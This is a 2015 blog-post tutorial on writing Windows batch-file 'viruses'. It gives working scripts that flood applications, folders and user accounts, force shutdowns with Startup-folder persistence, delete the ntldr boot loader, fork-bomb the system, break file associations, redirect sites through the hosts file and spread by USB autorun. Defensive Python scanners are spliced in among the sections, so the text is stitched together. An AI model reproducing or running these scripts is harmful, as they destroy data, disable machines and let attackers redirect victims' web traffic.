Wednesday 16 December 2015

Batch Files - The Arts Of Creating Viruses

I could just give you the code to paste into Notepad and ask you to save the files with the extension .bat, and your deadly batch viruses would be ready. But instead of that, I have focused on making the basics of batch files clear and developing the approach to code your own viruses.
What are Batch Files?
Let's begin with a simple example. Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one:
1. md x // makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'
We first make a folder/directory 'x', then enter folder 'x', then make a folder 'y' in folder 'x'.
Now delete the folder 'x'.
Let's do the same thing another way. Copy these three commands into Notepad and save the file as anything.bat.
Now just double-click this batch file and the same work will be done: you will get a folder 'x' on your desktop and a folder 'y' in it. This means the three commands executed line by line when we ran the batch file.
So a batch file is simply a text file containing a series of commands which are executed automatically, line by line, when the batch file is run.
What can batch viruses do?
They can be used to delete Windows files, format data, steal information, irritate the victim, consume CPU resources to affect performance, disable firewalls, open ports, modify or destroy the registry, and for many more purposes.
Now let's start with simple code. Just copy the code into Notepad and save it as anything.bat (i.e. any name you wish, but the extension must be .bat, and save it as 'all files' instead of text files).
Note: Type 'help' in the command prompt to learn about some basic commands; to learn how to use a particular command, type 'command_name /?' without quotes.
1. Application Bomber
@echo off // It instructs to hide the
commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
When executed, this code will repeatedly open different applications such as Paint, Notepad and the command prompt, irritating the victim and of course affecting performance.
2. Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x
Here %random% is a variable that generates a random positive number. So this code would start creating folders whose names can be any random number.
3. User account flooder
@echo off
:x
net user %random% /add //create user
account
goto x
This code would start creating Windows user accounts whose names could be any random numbers.
3. Shutdown Virus
copy anything.bat “C:\Documents and
Settings\Administrator\Start Menu\Programs
\Startup”
copy anything.bat “C:\Documents and
Settings\All Users\Start Menu\Programs
\Startup” //these two commands will copy
the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the
computer in 0 seconds
Note: Files in the Startup folder get started automatically when Windows starts. You should include the first two lines of code in every virus so that it copies itself into the Startup folder. The Startup folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Every time the victim starts the computer, the batch file in Startup would run and shut down the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from the Startup folder.
4. Deleting boot files
Go to the C drive in Windows XP, then Tools -> Folder Options -> View.
Now uncheck the option 'Hide operating system files' and check the option 'Show hidden files and folders'. Click Apply.
Now you can see the operating system files. There is a file 'ntldr', which is the boot loader used to boot Windows.
Let's make a batch file to delete this file from the victim's computer, and Windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear
system file attribute, read only attribute ,
hidden file attribute respectively
del ntldr //delete ntldr file
After running this batch file, the system will not reboot, and a normal victim would definitely install Windows again.
5. Fork Bomb
%0|%0 //Its percentage zero pipe
percentage zero
This code creates a large number of processes very quickly in order to saturate the Windows process table. It will just hang Windows.
6. Extension Changer
@echo off
assoc .txt=anything // this command
associates extension .txt with filetype
anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
Every extension is associated with a file type; for example, the extension 'exe' is associated with the file type 'exefile'. To see them, just enter the command 'assoc' in the command prompt.
The above code changes the association of some extensions to the file type 'anything' (meaning you can write anything), which obviously doesn't exist. So all exe (Paint, games, command prompt and many more), jpeg, png and mpeg files wouldn't open properly.
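For triage of an unknown .bat file, the behaviours shown in the snippets above can be matched statically. This is an added example, not code from the original post; the rule names, the `scan_batch` function and both sample scripts are constructed for illustration.

```python
import re

# One heuristic per behaviour described on this page (assumed rule names).
RULES = [
    ("self-piping fork bomb", re.compile(r"%0\s*\|\s*%0")),
    ("copy into Startup folder", re.compile(r"\b(copy|xcopy|move)\b.*\\startup", re.I)),
    ("forced shutdown", re.compile(r"\bshutdown\b.*[-/][sr]\b", re.I)),
    ("boot loader tampering", re.compile(r"\b(attrib|del|erase)\b.*\bntldr\b", re.I)),
    ("file association change", re.compile(r"^assoc\s+\.\w+\s*=", re.I)),
    ("hosts file write", re.compile(r">>?\s*\S*drivers\\etc\\hosts", re.I)),
    ("account creation", re.compile(r"\bnet\s+user\b.*/add\b", re.I)),
]
SPAWN = re.compile(r"^(start|md|mkdir|net\s+user)\b", re.I)  # commands that create things
GUARD = re.compile(r"^(if|exit)\b", re.I)                     # anything that can end a loop


def scan_batch(text):
    """Return [(line_no, finding)] for a batch script given as a string."""
    findings, labels = [], {}
    # Drop the page's "// note" annotations; a real script would use REM or ::
    lines = [ln.split("//")[0].strip() for ln in text.splitlines()]
    for no, line in enumerate(lines, 1):
        findings += [(no, name) for name, rx in RULES if rx.search(line)]
        label = re.match(r":(\w+)", line)
        if label:
            labels[label.group(1).lower()] = no
        jump = re.match(r"goto\s+:?(\w+)", line, re.I)
        if jump and jump.group(1).lower() in labels:
            body = lines[labels[jump.group(1).lower()]:no - 1]
            # A backward goto with no exit condition around spawn commands
            # is the shape of the "bomber" and "flooder" loops.
            if not any(GUARD.match(b) for b in body) and any(SPAWN.match(b) for b in body):
                findings.append((no, "unbounded spawn loop"))
    return findings


# Constructed samples: snippets in the page's style and a benign retry loop.
SUSPECT = "@echo off\n:x\nmd %random% // makes folder\ngoto x\nassoc .txt=anything\n%0|%0\n"
BENIGN = "@echo off\n:retry\nif exist done.flag exit /b\nstart /wait setup.exe\ngoto retry\n"

if __name__ == "__main__":
    for no, finding in scan_batch(SUSPECT):
        print(f"line {no}: {finding}")
    print("benign findings:", scan_batch(BENIGN))
```

The rules are heuristics for a first pass: a hit means the script deserves a manual read, and a clean result does not prove the file is harmless.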
7. DNS Poisoning
There is a file called 'hosts' located at c:\windows\system32\drivers\etc. In it we can place a website name with an IP in front of it. By doing this, we make the web browser take us to the host located at that IP when that website name is entered. That is, the request to resolve the website's IP is not sent to the Domain Name Server (DNS) if the website's name is in the hosts file.
@echo off
echo xxx.xxx.xxx.xxx www.anything.com >
C:\windows\system32\drivers\etc\hosts //
this command prints or add xxx.xxx.xxx.xxx.
www.anything.com in hosts file.
Replace xxx.xxx.xxx.xxx and www.anything.com with the IP address and website of your choice. You can redirect the victim to any host located at a specific IP when he tries to log on to a specific website, or you can simply block any website by entering its name and any invalid IP address.
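Because the hosts file overrides DNS in this way, auditing it is a quick check for both the redirect and the block cases described above. The following is an added example, not part of the original post; `audit_hosts`, the `EXPECTED` name list and the sample file contents are assumptions made for illustration.

```python
import ipaddress

# Names a default hosts file may legitimately map to loopback (assumption).
EXPECTED = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}


def audit_hosts(text):
    """Return (line_no, address, hostname, reason) for entries worth reviewing."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()        # drop comments
        if not line:
            continue
        addr, *names = line.split()
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            reason = "unparseable address"          # the "invalid IP" blocking trick
        else:
            if ip.is_loopback or ip.is_unspecified:
                reason = "sinkholed locally"
            else:
                reason = "redirected to another host"
        for name in names:
            if reason == "sinkholed locally" and name.lower() in EXPECTED:
                continue                            # normal localhost entry
            findings.append((no, addr, name, reason))
    return findings


# Constructed sample hosts file; addresses are documentation/test values.
SAMPLE_HOSTS = """\
# constructed sample hosts file
127.0.0.1 localhost
::1 localhost
203.0.113.5 www.anything.com   # entry in the style of the snippet above
0.0.0.0 blocked.example
999.1.1.1 other.example
"""

if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS):
        print(finding)
```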
Spreading batch viruses through pen drive:
Step 1.
Open Notepad and write
[autorun]
open=anything.bat
Icon=anything.ico
Save the file as 'autorun.inf'.
Step 2. Put this 'autorun.inf' and your actual batch virus 'anything.bat' on the pen drive. When the victim plugs in the pen drive, autorun.inf will launch anything.bat and the commands in the batch file virus will execute.
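A removable drive can be checked for this mechanism before anything on it is opened by reading autorun.inf and listing the entries that launch a program. This is an added example, not code from the original post; the function names and the sample file are constructed, and the set of launch keys checked (`open`, `shellexecute`, `shell\<verb>\command`) is limited to those three.

```python
import os

LAUNCH_KEYS = {"open", "shellexecute"}   # autorun.inf entries that start a program


def autorun_launch_entries(text):
    """Return [(key, value)] for launch entries in the [autorun] section."""
    section, hits = None, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        key = key.lower()                # keys are case-insensitive
        is_verb = key.startswith("shell\\") and key.endswith("\\command")
        if key in LAUNCH_KEYS or is_verb:
            hits.append((key, value))
    return hits


def check_drive(root):
    """Return (key, target, target_exists) for launch entries in <root>/autorun.inf."""
    name = next((f for f in os.listdir(root) if f.lower() == "autorun.inf"), None)
    if name is None:
        return []
    with open(os.path.join(root, name), encoding="utf-8", errors="replace") as fh:
        entries = autorun_launch_entries(fh.read())
    report = []
    for key, value in entries:
        parts = value.split()
        target = parts[0].strip('"') if parts else ""   # first token is the program
        report.append((key, target, os.path.isfile(os.path.join(root, target))))
    return report


# Constructed sample with the same three lines as the file shown above.
SAMPLE_INF = "[autorun]\nopen=anything.bat\nIcon=anything.ico\n"

if __name__ == "__main__":
    print(autorun_launch_entries(SAMPLE_INF))
```

Windows 7 and later no longer act on these launch entries for USB flash drives, so a hit matters most for older or unpatched systems and as an indicator during triage.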
